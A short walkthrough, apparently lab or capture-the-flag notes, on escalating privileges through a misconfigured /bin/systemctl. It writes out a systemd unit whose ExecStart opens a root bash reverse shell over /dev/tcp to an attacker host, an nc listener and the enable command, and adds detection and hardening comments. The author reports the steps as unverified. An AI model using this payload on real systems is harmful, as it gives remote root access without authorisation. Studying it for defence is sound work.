/bin/systemctl
I tried this one in practice but could not get a reverse shell, so treat the steps below as unverified.
# Unit file used by these notes: written on the Kali host (10.10.10.10), served from /tmp,
# and named root.service.
# NOTE(review): presumably this depends on /bin/systemctl being runnable with elevated
# rights on the target (e.g. SUID or a sudo rule) -- the page does not say; confirm.
# Comments sit on their own lines because systemd does not treat a trailing '#' as a comment.
[Unit]
Description=roooooooooot
[Service]
# simple: the ExecStart process itself is the service's main process.
Type=simple
# ExecStart runs as root. This is why letting an unprivileged user load an arbitrary unit
# is a privilege-escalation issue.
User=root
# Starts an interactive bash whose stdin, stdout and stderr are redirected to a TCP
# connection to 10.10.10.10:9999 (bash's /dev/tcp redirection).
# Detection: a bash process owned by root, parented by systemd, holding an outbound socket;
# "/dev/tcp/" appearing in any ExecStart= line is worth alerting on.
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/9999 0>&1'
[Install]
# Enabling a unit with this line leaves a symlink under
# /etc/systemd/system/multi-user.target.wants/. A link there that resolves to /tmp or another
# world-writable path is a strong indicator to alert on.
WantedBy=multi-user.target
# These commands run on two different hosts, so this is a walkthrough, not one script.
# Transfer step (on the target): the unit file is fetched with wget into a writable
# directory. The enable command below expects it at /tmp/root.service.
# Listener (on the Kali host), TCP port 9999, matching the port in ExecStart.
# Flags: -n no DNS lookups, -v verbose, -l listen, -p local port.
nc -nvlp 9999
# Step the notes use to trigger the unit (on the target). The author reports that it did not
# produce a shell.
# Defender view: a systemctl call whose argument is a unit file path under /tmp or another
# writable directory is unusual and worth an audit rule. Hardening: verify that systemctl
# is not SUID and is not granted to unprivileged users through sudo.
/bin/systemctl enable /tmp/root.service